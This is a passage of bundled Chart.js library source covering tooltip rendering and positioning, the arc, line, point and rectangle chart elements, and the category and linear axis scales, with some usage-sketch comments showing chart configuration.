var bodySpacing = vm.bodySpacing;
var body = vm.body;
ctx.textAlign = vm._bodyAlign;
ctx.textBaseline = 'top';
var textColor = mergeOpacity(vm.bodyFontColor, opacity);
ctx.fillStyle = textColor;
ctx.font = helpers.fontString(bodyFontSize, vm._bodyFontStyle, vm._bodyFontFamily);
// Before Body
var xLinePadding = 0;
var fillLineOfText = function (line) {
ctx.fillText(line, pt.x + xLinePadding, pt.y);
pt.y += bodyFontSize + bodySpacing;
};
// Before body lines
helpers.each(vm.beforeBody, fillLineOfText);
var drawColorBoxes = vm.displayColors;
xLinePadding = drawColorBoxes ? (bodyFontSize + 2) : 0;
// Draw body lines now
helpers.each(body, function (bodyItem, i) {
helpers.each(bodyItem.before, fillLineOfText);
helpers.each(bodyItem.lines, function (line) {
// Draw Legend-like boxes if needed
if (drawColorBoxes) {
// Fill a white rect so that colours merge nicely if the opacity is < 1
ctx.fillStyle = mergeOpacity(vm.legendColorBackground, opacity);
ctx.fillRect(pt.x, pt.y, bodyFontSize, bodyFontSize);
// Border
ctx.strokeStyle = mergeOpacity(vm.labelColors[i].borderColor, opacity);
ctx.strokeRect(pt.x, pt.y, bodyFontSize, bodyFontSize);
// Inner square
ctx.fillStyle = mergeOpacity(vm.labelColors[i].backgroundColor, opacity);
ctx.fillRect(pt.x + 1, pt.y + 1, bodyFontSize - 2, bodyFontSize - 2);
ctx.fillStyle = textColor;
}
fillLineOfText(line);
});
helpers.each(bodyItem.after, fillLineOfText);
});
// Reset back to 0 for after body
xLinePadding = 0;
// After body lines
helpers.each(vm.afterBody, fillLineOfText);
pt.y -= bodySpacing; // Remove last body spacing
},
drawFooter: function (pt, vm, ctx, opacity) {
var footer = vm.footer;
if (footer.length) {
pt.y += vm.footerMarginTop;
ctx.textAlign = vm._footerAlign;
ctx.textBaseline = 'top';
ctx.fillStyle = mergeOpacity(vm.footerFontColor, opacity);
ctx.font = helpers.fontString(vm.footerFontSize, vm._footerFontStyle, vm._footerFontFamily);
helpers.each(footer, function (line) {
ctx.fillText(line, pt.x, pt.y);
pt.y += vm.footerFontSize + vm.footerSpacing;
});
}
},
drawBackground: function (pt, vm, ctx, tooltipSize, opacity) {
ctx.fillStyle = mergeOpacity(vm.backgroundColor, opacity);
helpers.drawRoundedRectangle(ctx, pt.x, pt.y, tooltipSize.width, tooltipSize.height, vm.cornerRadius);
ctx.fill();
},
draw: function () {
var ctx = this._chart.ctx;
var vm = this._view;
if (vm.opacity === 0) {
return;
}
var tooltipSize = {
width: vm.width,
height: vm.height
};
var pt = {
x: vm.x,
y: vm.y
};
// IE11/Edge does not like very small opacities, so snap to 0
var opacity = Math.abs(vm.opacity) < 1e-3 ? 0 : vm.opacity;
if (this._options.enabled) {
// Draw Background
this.drawBackground(pt, vm, ctx, tooltipSize, opacity);
// Draw Caret
this.drawCaret(pt, tooltipSize, opacity);
// Draw Title, Body, and Footer
pt.x += vm.xPadding;
pt.y += vm.yPadding;
// Titles
this.drawTitle(pt, vm, ctx, opacity);
// Body
this.drawBody(pt, vm, ctx, opacity);
// Footer
this.drawFooter(pt, vm, ctx, opacity);
}
},
/**
* Handle an event
* @private
* @param e {Event} the event to handle
* @returns {Boolean} true if the tooltip changed
*/
handleEvent: function (e) {
var me = this;
var options = me._options;
var changed = false;
me._lastActive = me._lastActive || [];
// Find Active Elements for tooltips
if (e.type === 'mouseout') {
me._active = [];
} else {
me._active = me._chartInstance.getElementsAtEventForMode(e, options.mode, options);
}
// Remember Last Actives
changed = !helpers.arrayEquals(me._active, me._lastActive);
me._lastActive = me._active;
if (options.enabled || options.custom) {
me._eventPosition = helpers.getRelativePosition(e, me._chart);
var model = me._model;
me.update(true);
me.pivot();
// See if our tooltip position changed
changed |= (model.x !== me._model.x) || (model.y !== me._model.y);
}
return changed;
}
});
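/*
 * Usage sketch (illustrative only; `ctx` and `data` are assumed to exist in
 * calling code): the callbacks consumed by getTitle/getBody/getFooter above
 * are supplied through the chart options, e.g. a custom body line per item:
 *
 * new Chart(ctx, {
 *     type: 'line',
 *     data: data,
 *     options: {
 *         tooltips: {
 *             callbacks: {
 *                 label: function (tooltipItem, data) {
 *                     return data.datasets[tooltipItem.datasetIndex].label + ': ' + tooltipItem.yLabel;
 *                 }
 *             }
 *         }
 *     }
 * });
 */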
/**
* @namespace Chart.Tooltip.positioners
*/
Chart.Tooltip.positioners = {
/**
* Average mode places the tooltip at the average position of the elements shown
* @function Chart.Tooltip.positioners.average
* @param elements {ChartElement[]} the elements being displayed in the tooltip
* @returns {Point} tooltip position
*/
average: function (elements) {
if (!elements.length) {
return false;
}
var i, len;
var x = 0;
var y = 0;
var count = 0;
for (i = 0, len = elements.length; i < len; ++i) {
var el = elements[i];
if (el && el.hasValue()) {
var pos = el.tooltipPosition();
x += pos.x;
y += pos.y;
++count;
}
}
return {
x: Math.round(x / count),
y: Math.round(y / count)
};
},
/**
* Gets the tooltip position from the item nearest to the event position
* @function Chart.Tooltip.positioners.nearest
* @param elements {Chart.Element[]} the tooltip elements
* @param eventPosition {Point} the position of the event in canvas coordinates
* @returns {Point} the tooltip position
*/
nearest: function (elements, eventPosition) {
var x = eventPosition.x;
var y = eventPosition.y;
var nearestElement;
var minDistance = Number.POSITIVE_INFINITY;
var i, len;
for (i = 0, len = elements.length; i < len; ++i) {
var el = elements[i];
if (el && el.hasValue()) {
var center = el.getCenterPoint();
var d = helpers.distanceBetweenPoints(eventPosition, center);
if (d < minDistance) {
minDistance = d;
nearestElement = el;
}
}
}
if (nearestElement) {
var tp = nearestElement.tooltipPosition();
x = tp.x;
y = tp.y;
}
return {
x: x,
y: y
};
}
};
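/*
 * Usage sketch: charts pick a positioner by name via options.tooltips.position,
 * and custom positioners can be registered on this namespace (the name 'cursor'
 * below is illustrative):
 *
 * Chart.Tooltip.positioners.cursor = function (elements, eventPosition) {
 *     // Pin the tooltip to the pointer instead of to the elements
 *     return {x: eventPosition.x, y: eventPosition.y};
 * };
 * // then: options: {tooltips: {position: 'cursor'}}
 */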
};
}, {}], 37: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers,
globalOpts = Chart.defaults.global;
globalOpts.elements.arc = {
backgroundColor: globalOpts.defaultColor,
borderColor: '#fff',
borderWidth: 2
};
Chart.elements.Arc = Chart.Element.extend({
inLabelRange: function (mouseX) {
var vm = this._view;
if (vm) {
return (Math.pow(mouseX - vm.x, 2) < Math.pow(vm.radius + vm.hoverRadius, 2));
}
return false;
},
inRange: function (chartX, chartY) {
var vm = this._view;
if (vm) {
var pointRelativePosition = helpers.getAngleFromPoint(vm, {
x: chartX,
y: chartY
}),
angle = pointRelativePosition.angle,
distance = pointRelativePosition.distance;
// Sanitise angle range
var startAngle = vm.startAngle;
var endAngle = vm.endAngle;
while (endAngle < startAngle) {
endAngle += 2.0 * Math.PI;
}
while (angle > endAngle) {
angle -= 2.0 * Math.PI;
}
while (angle < startAngle) {
angle += 2.0 * Math.PI;
}
// Check if within the range of the open/close angle
var betweenAngles = (angle >= startAngle && angle <= endAngle),
withinRadius = (distance >= vm.innerRadius && distance <= vm.outerRadius);
return (betweenAngles && withinRadius);
}
return false;
},
getCenterPoint: function () {
var vm = this._view;
var halfAngle = (vm.startAngle + vm.endAngle) / 2;
var halfRadius = (vm.innerRadius + vm.outerRadius) / 2;
return {
x: vm.x + Math.cos(halfAngle) * halfRadius,
y: vm.y + Math.sin(halfAngle) * halfRadius
};
},
getArea: function () {
var vm = this._view;
return Math.PI * ((vm.endAngle - vm.startAngle) / (2 * Math.PI)) * (Math.pow(vm.outerRadius, 2) - Math.pow(vm.innerRadius, 2));
},
tooltipPosition: function () {
var vm = this._view;
var centreAngle = vm.startAngle + ((vm.endAngle - vm.startAngle) / 2),
rangeFromCentre = (vm.outerRadius - vm.innerRadius) / 2 + vm.innerRadius;
return {
x: vm.x + (Math.cos(centreAngle) * rangeFromCentre),
y: vm.y + (Math.sin(centreAngle) * rangeFromCentre)
};
},
draw: function () {
var ctx = this._chart.ctx,
vm = this._view,
sA = vm.startAngle,
eA = vm.endAngle;
ctx.beginPath();
ctx.arc(vm.x, vm.y, vm.outerRadius, sA, eA);
ctx.arc(vm.x, vm.y, vm.innerRadius, eA, sA, true);
ctx.closePath();
ctx.strokeStyle = vm.borderColor;
ctx.lineWidth = vm.borderWidth;
ctx.fillStyle = vm.backgroundColor;
ctx.fill();
ctx.lineJoin = 'bevel';
if (vm.borderWidth) {
ctx.stroke();
}
}
});
};
}, {}], 38: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
var globalDefaults = Chart.defaults.global;
Chart.defaults.global.elements.line = {
tension: 0.4,
backgroundColor: globalDefaults.defaultColor,
borderWidth: 3,
borderColor: globalDefaults.defaultColor,
borderCapStyle: 'butt',
borderDash: [],
borderDashOffset: 0.0,
borderJoinStyle: 'miter',
capBezierPoints: true,
fill: true // do we fill in the area between the line and its base axis
};
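/*
 * Usage sketch (dataset values illustrative): these element defaults can be
 * overridden per dataset; a straight, unfilled line skips both the bezier
 * control points and the fill pass in Line.draw below:
 *
 * datasets: [{
 *     data: [1, 4, 2, 8],
 *     lineTension: 0, // straight segments instead of bezier curves
 *     fill: false // no area fill between the line and its base axis
 * }]
 */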
Chart.elements.Line = Chart.Element.extend({
draw: function () {
var me = this;
var vm = me._view;
var spanGaps = vm.spanGaps;
var fillPoint = vm.scaleZero;
var loop = me._loop;
// Handle different fill modes for cartesian lines
if (!loop) {
if (vm.fill === 'top') {
fillPoint = vm.scaleTop;
} else if (vm.fill === 'bottom') {
fillPoint = vm.scaleBottom;
}
}
var ctx = me._chart.ctx;
ctx.save();
// Helper function to draw a line to a point
function lineToPoint(previousPoint, point) {
var pointVM = point._view;
if (point._view.steppedLine === true) {
ctx.lineTo(pointVM.x, previousPoint._view.y);
ctx.lineTo(pointVM.x, pointVM.y);
} else if (point._view.tension === 0) {
ctx.lineTo(pointVM.x, pointVM.y);
} else {
ctx.bezierCurveTo(
previousPoint._view.controlPointNextX,
previousPoint._view.controlPointNextY,
pointVM.controlPointPreviousX,
pointVM.controlPointPreviousY,
pointVM.x,
pointVM.y
);
}
}
var points = me._children.slice(); // clone array
var lastDrawnIndex = -1;
// If we are looping, add the first point again at the end
if (loop && points.length) {
points.push(points[0]);
}
var index, current, previous, currentVM;
// Fill Line
if (points.length && vm.fill) {
ctx.beginPath();
for (index = 0; index < points.length; ++index) {
current = points[index];
previous = helpers.previousItem(points, index);
currentVM = current._view;
// First point moves to its starting position no matter what
if (index === 0) {
if (loop) {
ctx.moveTo(fillPoint.x, fillPoint.y);
} else {
ctx.moveTo(currentVM.x, fillPoint);
}
if (!currentVM.skip) {
lastDrawnIndex = index;
ctx.lineTo(currentVM.x, currentVM.y);
}
} else {
previous = lastDrawnIndex === -1 ? previous : points[lastDrawnIndex];
if (currentVM.skip) {
// Only do this if this is the first point that is skipped
if (!spanGaps && lastDrawnIndex === (index - 1)) {
if (loop) {
ctx.lineTo(fillPoint.x, fillPoint.y);
} else {
ctx.lineTo(previous._view.x, fillPoint);
}
}
} else {
if (lastDrawnIndex !== (index - 1)) {
// There was a gap and this is the first point after the gap. If we've never drawn a point, this is a special case.
// If the first data point is NaN, then there is no real gap to skip
if (spanGaps && lastDrawnIndex !== -1) {
// We are spanning the gap, so simply draw a line to this point
lineToPoint(previous, current);
} else if (loop) {
ctx.lineTo(currentVM.x, currentVM.y);
} else {
ctx.lineTo(currentVM.x, fillPoint);
ctx.lineTo(currentVM.x, currentVM.y);
}
} else {
// Line to next point
lineToPoint(previous, current);
}
lastDrawnIndex = index;
}
}
}
if (!loop && lastDrawnIndex !== -1) {
ctx.lineTo(points[lastDrawnIndex]._view.x, fillPoint);
}
ctx.fillStyle = vm.backgroundColor || globalDefaults.defaultColor;
ctx.closePath();
ctx.fill();
}
// Stroke Line Options
var globalOptionLineElements = globalDefaults.elements.line;
ctx.lineCap = vm.borderCapStyle || globalOptionLineElements.borderCapStyle;
// IE 9 and 10 do not support line dash
if (ctx.setLineDash) {
ctx.setLineDash(vm.borderDash || globalOptionLineElements.borderDash);
}
ctx.lineDashOffset = vm.borderDashOffset || globalOptionLineElements.borderDashOffset;
ctx.lineJoin = vm.borderJoinStyle || globalOptionLineElements.borderJoinStyle;
ctx.lineWidth = vm.borderWidth || globalOptionLineElements.borderWidth;
ctx.strokeStyle = vm.borderColor || globalDefaults.defaultColor;
// Stroke Line
ctx.beginPath();
lastDrawnIndex = -1;
for (index = 0; index < points.length; ++index) {
current = points[index];
previous = helpers.previousItem(points, index);
currentVM = current._view;
// First point moves to its starting position no matter what
if (index === 0) {
if (!currentVM.skip) {
ctx.moveTo(currentVM.x, currentVM.y);
lastDrawnIndex = index;
}
} else {
previous = lastDrawnIndex === -1 ? previous : points[lastDrawnIndex];
if (!currentVM.skip) {
if ((lastDrawnIndex !== (index - 1) && !spanGaps) || lastDrawnIndex === -1) {
// There was a gap and this is the first point after the gap
ctx.moveTo(currentVM.x, currentVM.y);
} else {
// Line to next point
lineToPoint(previous, current);
}
lastDrawnIndex = index;
}
}
}
ctx.stroke();
ctx.restore();
}
});
};
}, {}], 39: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers,
globalOpts = Chart.defaults.global,
defaultColor = globalOpts.defaultColor;
globalOpts.elements.point = {
radius: 3,
pointStyle: 'circle',
backgroundColor: defaultColor,
borderWidth: 1,
borderColor: defaultColor,
// Hover
hitRadius: 1,
hoverRadius: 4,
hoverBorderWidth: 1
};
function xRange(mouseX) {
var vm = this._view;
return vm ? (Math.pow(mouseX - vm.x, 2) < Math.pow(vm.radius + vm.hitRadius, 2)) : false;
}
function yRange(mouseY) {
var vm = this._view;
return vm ? (Math.pow(mouseY - vm.y, 2) < Math.pow(vm.radius + vm.hitRadius, 2)) : false;
}
Chart.elements.Point = Chart.Element.extend({
inRange: function (mouseX, mouseY) {
var vm = this._view;
return vm ? ((Math.pow(mouseX - vm.x, 2) + Math.pow(mouseY - vm.y, 2)) < Math.pow(vm.hitRadius + vm.radius, 2)) : false;
},
inLabelRange: xRange,
inXRange: xRange,
inYRange: yRange,
getCenterPoint: function () {
var vm = this._view;
return {
x: vm.x,
y: vm.y
};
},
getArea: function () {
return Math.PI * Math.pow(this._view.radius, 2);
},
tooltipPosition: function () {
var vm = this._view;
return {
x: vm.x,
y: vm.y,
padding: vm.radius + vm.borderWidth
};
},
draw: function () {
var vm = this._view;
var ctx = this._chart.ctx;
var pointStyle = vm.pointStyle;
var radius = vm.radius;
var x = vm.x;
var y = vm.y;
if (vm.skip) {
return;
}
ctx.strokeStyle = vm.borderColor || defaultColor;
ctx.lineWidth = helpers.getValueOrDefault(vm.borderWidth, globalOpts.elements.point.borderWidth);
ctx.fillStyle = vm.backgroundColor || defaultColor;
Chart.canvasHelpers.drawPoint(ctx, pointStyle, radius, x, y);
}
});
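/*
 * Usage sketch (values illustrative): inRange above tests against
 * radius + hitRadius, so enlarging hitRadius makes small points easier to
 * hover without changing how they are drawn:
 *
 * options: {elements: {point: {radius: 2, hitRadius: 8, hoverRadius: 6}}}
 */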
};
}, {}], 40: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var globalOpts = Chart.defaults.global;
globalOpts.elements.rectangle = {
backgroundColor: globalOpts.defaultColor,
borderWidth: 0,
borderColor: globalOpts.defaultColor,
borderSkipped: 'bottom'
};
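/*
 * Usage sketch: borderSkipped names the edge left unstroked by Rectangle.draw
 * below ('bottom', 'left', 'top' or 'right'), e.g. for horizontal bars:
 *
 * options: {elements: {rectangle: {borderWidth: 2, borderSkipped: 'left'}}}
 */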
function isVertical(bar) {
return bar._view.width !== undefined;
}
/**
* Helper function to get the bounds of the bar regardless of the orientation
* @private
* @param bar {Chart.Element.Rectangle} the bar
* @return {Bounds} bounds of the bar
*/
function getBarBounds(bar) {
var vm = bar._view;
var x1, x2, y1, y2;
if (isVertical(bar)) {
// vertical
var halfWidth = vm.width / 2;
x1 = vm.x - halfWidth;
x2 = vm.x + halfWidth;
y1 = Math.min(vm.y, vm.base);
y2 = Math.max(vm.y, vm.base);
} else {
// horizontal bar
var halfHeight = vm.height / 2;
x1 = Math.min(vm.x, vm.base);
x2 = Math.max(vm.x, vm.base);
y1 = vm.y - halfHeight;
y2 = vm.y + halfHeight;
}
return {
left: x1,
top: y1,
right: x2,
bottom: y2
};
}
Chart.elements.Rectangle = Chart.Element.extend({
draw: function () {
var ctx = this._chart.ctx;
var vm = this._view;
var halfWidth = vm.width / 2,
leftX = vm.x - halfWidth,
rightX = vm.x + halfWidth,
top = vm.base - (vm.base - vm.y),
halfStroke = vm.borderWidth / 2;
// Canvas doesn't allow us to stroke inside the width so we can
// adjust the sizes to fit if we're setting a stroke on the line
if (vm.borderWidth) {
leftX += halfStroke;
rightX -= halfStroke;
top += halfStroke;
}
ctx.beginPath();
ctx.fillStyle = vm.backgroundColor;
ctx.strokeStyle = vm.borderColor;
ctx.lineWidth = vm.borderWidth;
// Corner points, from bottom-left to bottom-right clockwise
// | 1 2 |
// | 0 3 |
var corners = [
[leftX, vm.base],
[leftX, top],
[rightX, top],
[rightX, vm.base]
];
// Find first (starting) corner with fallback to 'bottom'
var borders = ['bottom', 'left', 'top', 'right'];
var startCorner = borders.indexOf(vm.borderSkipped, 0);
if (startCorner === -1) {
startCorner = 0;
}
function cornerAt(index) {
return corners[(startCorner + index) % 4];
}
// Draw rectangle from 'startCorner'
var corner = cornerAt(0);
ctx.moveTo(corner[0], corner[1]);
for (var i = 1; i < 4; i++) {
corner = cornerAt(i);
ctx.lineTo(corner[0], corner[1]);
}
ctx.fill();
if (vm.borderWidth) {
ctx.stroke();
}
},
height: function () {
var vm = this._view;
return vm.base - vm.y;
},
inRange: function (mouseX, mouseY) {
var inRange = false;
if (this._view) {
var bounds = getBarBounds(this);
inRange = mouseX >= bounds.left && mouseX <= bounds.right && mouseY >= bounds.top && mouseY <= bounds.bottom;
}
return inRange;
},
inLabelRange: function (mouseX, mouseY) {
var me = this;
if (!me._view) {
return false;
}
var inRange = false;
var bounds = getBarBounds(me);
if (isVertical(me)) {
inRange = mouseX >= bounds.left && mouseX <= bounds.right;
} else {
inRange = mouseY >= bounds.top && mouseY <= bounds.bottom;
}
return inRange;
},
inXRange: function (mouseX) {
var bounds = getBarBounds(this);
return mouseX >= bounds.left && mouseX <= bounds.right;
},
inYRange: function (mouseY) {
var bounds = getBarBounds(this);
return mouseY >= bounds.top && mouseY <= bounds.bottom;
},
getCenterPoint: function () {
var vm = this._view;
var x, y;
if (isVertical(this)) {
x = vm.x;
y = (vm.y + vm.base) / 2;
} else {
x = (vm.x + vm.base) / 2;
y = vm.y;
}
return {x: x, y: y};
},
getArea: function () {
var vm = this._view;
return vm.width * Math.abs(vm.y - vm.base);
},
tooltipPosition: function () {
var vm = this._view;
return {
x: vm.x,
y: vm.y
};
}
});
};
}, {}], 41: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
// Default config for a category scale
var defaultConfig = {
position: 'bottom'
};
var DatasetScale = Chart.Scale.extend({
/**
* Internal function to get the correct labels. If data.xLabels or data.yLabels are defined, use those
* else fall back to data.labels
* @private
*/
getLabels: function () {
var data = this.chart.data;
return (this.isHorizontal() ? data.xLabels : data.yLabels) || data.labels;
},
// Implement this so that the scale knows its min and max label indices before building ticks
determineDataLimits: function () {
var me = this;
var labels = me.getLabels();
me.minIndex = 0;
me.maxIndex = labels.length - 1;
var findIndex;
if (me.options.ticks.min !== undefined) {
// user specified min value
findIndex = helpers.indexOf(labels, me.options.ticks.min);
me.minIndex = findIndex !== -1 ? findIndex : me.minIndex;
}
if (me.options.ticks.max !== undefined) {
// user specified max value
findIndex = helpers.indexOf(labels, me.options.ticks.max);
me.maxIndex = findIndex !== -1 ? findIndex : me.maxIndex;
}
me.min = labels[me.minIndex];
me.max = labels[me.maxIndex];
},
buildTicks: function () {
var me = this;
var labels = me.getLabels();
// If we are viewing some subset of labels, slice the original array
me.ticks = (me.minIndex === 0 && me.maxIndex === labels.length - 1) ? labels : labels.slice(me.minIndex, me.maxIndex + 1);
},
getLabelForIndex: function (index, datasetIndex) {
var me = this;
var data = me.chart.data;
var isHorizontal = me.isHorizontal();
if ((data.xLabels && isHorizontal) || (data.yLabels && !isHorizontal)) {
return me.getRightValue(data.datasets[datasetIndex].data[index]);
}
return me.ticks[index];
},
// Used to get data value locations. Value can either be an index or a numerical value
getPixelForValue: function (value, index, datasetIndex, includeOffset) {
var me = this;
// 1 is added because we need the length but we have the indexes
var offsetAmt = Math.max((me.maxIndex + 1 - me.minIndex - ((me.options.gridLines.offsetGridLines) ? 0 : 1)), 1);
if (value !== undefined && isNaN(index)) {
var labels = me.getLabels();
var idx = labels.indexOf(value);
index = idx !== -1 ? idx : index;
}
if (me.isHorizontal()) {
var innerWidth = me.width - (me.paddingLeft + me.paddingRight);
var valueWidth = innerWidth / offsetAmt;
var widthOffset = (valueWidth * (index - me.minIndex)) + me.paddingLeft;
if ((me.options.gridLines.offsetGridLines && includeOffset) || (me.maxIndex === me.minIndex && includeOffset)) {
widthOffset += (valueWidth / 2);
}
return me.left + Math.round(widthOffset);
}
var innerHeight = me.height - (me.paddingTop + me.paddingBottom);
var valueHeight = innerHeight / offsetAmt;
var heightOffset = (valueHeight * (index - me.minIndex)) + me.paddingTop;
if (me.options.gridLines.offsetGridLines && includeOffset) {
heightOffset += (valueHeight / 2);
}
return me.top + Math.round(heightOffset);
},
getPixelForTick: function (index, includeOffset) {
return this.getPixelForValue(this.ticks[index], index + this.minIndex, null, includeOffset);
},
getValueForPixel: function (pixel) {
var me = this;
var value;
var offsetAmt = Math.max((me.ticks.length - ((me.options.gridLines.offsetGridLines) ? 0 : 1)), 1);
var horz = me.isHorizontal();
var innerDimension = horz ? me.width - (me.paddingLeft + me.paddingRight) : me.height - (me.paddingTop + me.paddingBottom);
var valueDimension = innerDimension / offsetAmt;
pixel -= horz ? me.left : me.top;
if (me.options.gridLines.offsetGridLines) {
pixel -= (valueDimension / 2);
}
pixel -= horz ? me.paddingLeft : me.paddingTop;
if (pixel <= 0) {
value = 0;
} else {
value = Math.round(pixel / valueDimension);
}
return value;
},
getBasePixel: function () {
return this.bottom;
}
});
Chart.scaleService.registerScaleType('category', DatasetScale, defaultConfig);
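/*
 * Usage sketch (label values illustrative): ticks.min/max accept label values,
 * so the axis can display a subset of data.labels:
 *
 * options: {scales: {xAxes: [{type: 'category', ticks: {min: 'March', max: 'June'}}]}}
 */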
};
}, {}], 42: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
var defaultConfig = {
position: 'left',
ticks: {
callback: Chart.Ticks.formatters.linear
}
};
var LinearScale = Chart.LinearScaleBase.extend({
determineDataLimits: function () {
var me = this;
var opts = me.options;
var chart = me.chart;
var data = chart.data;
var datasets = data.datasets;
var isHorizontal = me.isHorizontal();
function IDMatches(meta) {
return isHorizontal ? meta.xAxisID === me.id : meta.yAxisID === me.id;
}
// First Calculate the range
me.min = null;
me.max = null;
if (opts.stacked) {
var valuesPerType = {};
helpers.each(datasets, function (dataset, datasetIndex) {
var meta = chart.getDatasetMeta(datasetIndex);
if (valuesPerType[meta.type] === undefined) {
valuesPerType[meta.type] = {
positiveValues: [],
negativeValues: []
};
}
// Store these per type
var positiveValues = valuesPerType[meta.type].positiveValues;
var negativeValues = valuesPerType[meta.type].negativeValues;
if (chart.isDatasetVisible(datasetIndex) && IDMatches(meta)) {
helpers.each(dataset.data, function (rawValue, index) {
var value = +me.getRightValue(rawValue);
if (isNaN(value) || meta.data[index].hidden) {
return;
}
positiveValues[index] = positiveValues[index] || 0;
negativeValues[index] = negativeValues[index] || 0;
if (opts.relativePoints) {
positiveValues[index] = 100;
} else if (value < 0) {
negativeValues[index] += value;
} else {
positiveValues[index] += value;
}
});
}
});
helpers.each(valuesPerType, function (valuesForType) {
var values = valuesForType.positiveValues.concat(valuesForType.negativeValues);
var minVal = helpers.min(values);
var maxVal = helpers.max(values);
me.min = me.min === null ? minVal : Math.min(me.min, minVal);
me.max = me.max === null ? maxVal : Math.max(me.max, maxVal);
});
} else {
helpers.each(datasets, function (dataset, datasetIndex) {
var meta = chart.getDatasetMeta(datasetIndex);
if (chart.isDatasetVisible(datasetIndex) && IDMatches(meta)) {
helpers.each(dataset.data, function (rawValue, index) {
var value = +me.getRightValue(rawValue);
if (isNaN(value) || meta.data[index].hidden) {
return;
}
if (me.min === null) {
me.min = value;
} else if (value < me.min) {
me.min = value;
}
if (me.max === null) {
me.max = value;
} else if (value > me.max) {
me.max = value;
}
});
}
});
}
// Common base implementation to handle ticks.min, ticks.max, ticks.beginAtZero
this.handleTickRangeOptions();
},
getTickLimit: function () {
var maxTicks;
var me = this;
var tickOpts = me.options.ticks;
if (me.isHorizontal()) {
maxTicks = Math.min(tickOpts.maxTicksLimit ? tickOpts.maxTicksLimit : 11, Math.ceil(me.width / 50));
} else {
// The factor of 2 used to scale the font size has been experimentally determined.
var tickFontSize = helpers.getValueOrDefault(tickOpts.fontSize, Chart.defaults.global.defaultFontSize);
maxTicks = Math.min(tickOpts.maxTicksLimit ? tickOpts.maxTicksLimit : 11, Math.ceil(me.height / (2 * tickFontSize)));
}
return maxTicks;
},
// Called after the ticks are built. We need to reverse the ticks for vertical axes, where the top value is the highest
handleDirectionalChanges: function () {
if (!this.isHorizontal()) {
// We are in a vertical orientation. The top value is the highest. So reverse the array
this.ticks.reverse();
}
},
getLabelForIndex: function (index, datasetIndex) {
return +this.getRightValue(this.chart.data.datasets[datasetIndex].data[index]);
},
// Utils
getPixelForValue: function (value) {
// This must be called after fit has been run so that
// this.left, this.top, this.right, and this.bottom have been defined
var me = this;
var paddingLeft = me.paddingLeft;
var paddingBottom = me.paddingBottom;
var start = me.start;
var rightValue = +me.getRightValue(value);
var pixel;
var innerDimension;
var range = me.end - start;
if (me.isHorizontal()) {
innerDimension = me.width - (paddingLeft + me.paddingRight);
pixel = me.left + (innerDimension / range * (rightValue - start));
return Math.round(pixel + paddingLeft);
}
innerDimension = me.height - (me.paddingTop + paddingBottom);
pixel = (me.bottom - paddingBottom) - (innerDimension / range * (rightValue - start));
return Math.round(pixel);
},
getValueForPixel: function (pixel) {
var me = this;
var isHorizontal = me.isHorizontal();
var paddingLeft = me.paddingLeft;
var paddingBottom = me.paddingBottom;
var innerDimension = isHorizontal ? me.width - (paddingLeft + me.paddingRight) : me.height - (me.paddingTop + paddingBottom);
var offset = (isHorizontal ? pixel - me.left - paddingLeft : me.bottom - paddingBottom - pixel) / innerDimension;
return me.start + ((me.end - me.start) * offset);
},
getPixelForTick: function (index) {
return this.getPixelForValue(this.ticksAsNumbers[index]);
}
});
Chart.scaleService.registerScaleType('linear', LinearScale, defaultConfig);
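/*
 * Usage sketch: min/max pin the range exactly, while suggestedMin/suggestedMax
 * only widen it (see handleTickRangeOptions in Chart.LinearScaleBase):
 *
 * options: {scales: {yAxes: [{type: 'linear', ticks: {beginAtZero: true, suggestedMax: 100}}]}}
 */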
};
}, {}], 43: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers,
noop = helpers.noop;
Chart.LinearScaleBase = Chart.Scale.extend({
handleTickRangeOptions: function () {
var me = this;
var opts = me.options;
var tickOpts = opts.ticks;
// If we are forcing it to begin at 0, but 0 will already be rendered on the chart,
// do nothing since that would make the chart weird. If the user really wants a weird chart
// axis, they can manually override it
if (tickOpts.beginAtZero) {
var minSign = helpers.sign(me.min);
var maxSign = helpers.sign(me.max);
if (minSign < 0 && maxSign < 0) {
// move the top up to 0
me.max = 0;
} else if (minSign > 0 && maxSign > 0) {
// move the bottom down to 0
me.min = 0;
}
}
if (tickOpts.min !== undefined) {
me.min = tickOpts.min;
} else if (tickOpts.suggestedMin !== undefined) {
me.min = Math.min(me.min, tickOpts.suggestedMin);
}
if (tickOpts.max !== undefined) {
me.max = tickOpts.max;
} else if (tickOpts.suggestedMax !== undefined) {
me.max = Math.max(me.max, tickOpts.suggestedMax);
}
if (me.min === me.max) {
me.max++;
if (!tickOpts.beginAtZero) {
me.min--;
}
}
},
getTickLimit: noop,
handleDirectionalChanges: noop,
buildTicks: function () {
var me = this;
var opts = me.options;
var tickOpts = opts.ticks;
// Figure out the max number of ticks we can support based on the size of
// the axis area. For now, we say that the minimum tick spacing in pixels must be 50.
// We also limit the maximum number of ticks to 11, which gives a nice 10 squares on
// the graph. Make sure we always have at least 2 ticks.
var maxTicks = me.getTickLimit();
maxTicks = Math.max(2, maxTicks);
var numericGeneratorOptions = {
maxTicks: maxTicks,
min: tickOpts.min,
max: tickOpts.max,
stepSize: helpers.getValueOrDefault(tickOpts.fixedStepSize, tickOpts.stepSize)
};
var ticks = me.ticks = Chart.Ticks.generators.linear(numericGeneratorOptions, me);
me.handleDirectionalChanges();
// At this point, we need to update our max and min given the tick values since we have expanded the
// range of the scale
me.max = helpers.max(ticks);
me.min = helpers.min(ticks);
if (tickOpts.reverse) {
ticks.reverse();
me.start = me.max;
me.end = me.min;
} else {
me.start = me.min;
me.end = me.max;
}
},
convertTicksToLabels: function () {
var me = this;
me.ticksAsNumbers = me.ticks.slice();
me.zeroLineIndex = me.ticks.indexOf(0);
Chart.Scale.prototype.convertTicksToLabels.call(me);
}
});
};
}, {}], 44: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
var defaultConfig = {
position: 'left',
// label settings
ticks: {
callback: Chart.Ticks.formatters.logarithmic
}
};
var LogarithmicScale = Chart.Scale.extend({
determineDataLimits: function () {
var me = this;
var opts = me.options;
var tickOpts = opts.ticks;
var chart = me.chart;
var data = chart.data;
var datasets = data.datasets;
